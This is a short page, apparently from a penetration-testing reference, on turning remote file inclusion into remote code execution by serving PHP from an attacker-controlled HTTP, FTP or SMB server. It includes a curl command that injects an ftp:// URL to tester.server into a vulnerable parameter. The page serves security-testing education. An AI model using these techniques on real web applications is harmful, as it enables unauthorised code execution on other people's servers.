RFI to RCE
via HTTP
The tester can host an arbitrary PHP code and access it through the HTTP protocol
via FTP
The tester can also host his arbitrary PHP code and access it through the FTP protocol. He can use the python library pyftpdlib to start a FTP server.
PHP uses the anonymous credentials to authenticate to the FTP server. If the tester needs to use custom credentials, he can authenticate as follows :
curl '$URL/?parameter=ftp://user:pass@tester.server/phpinfo.php'
via SMB
Sometimes, the vulnerable web application is hosted on a Windows Server, meaning the attacker could log into a SMB Server to store the arbitrary PHP code.
Impacket's smbserver.py (Python) script can be used on the attacker-controlled machine to create a SMB Server.
The PHP script can then be included by using a UNC Path.
Last updated
Was this helpful?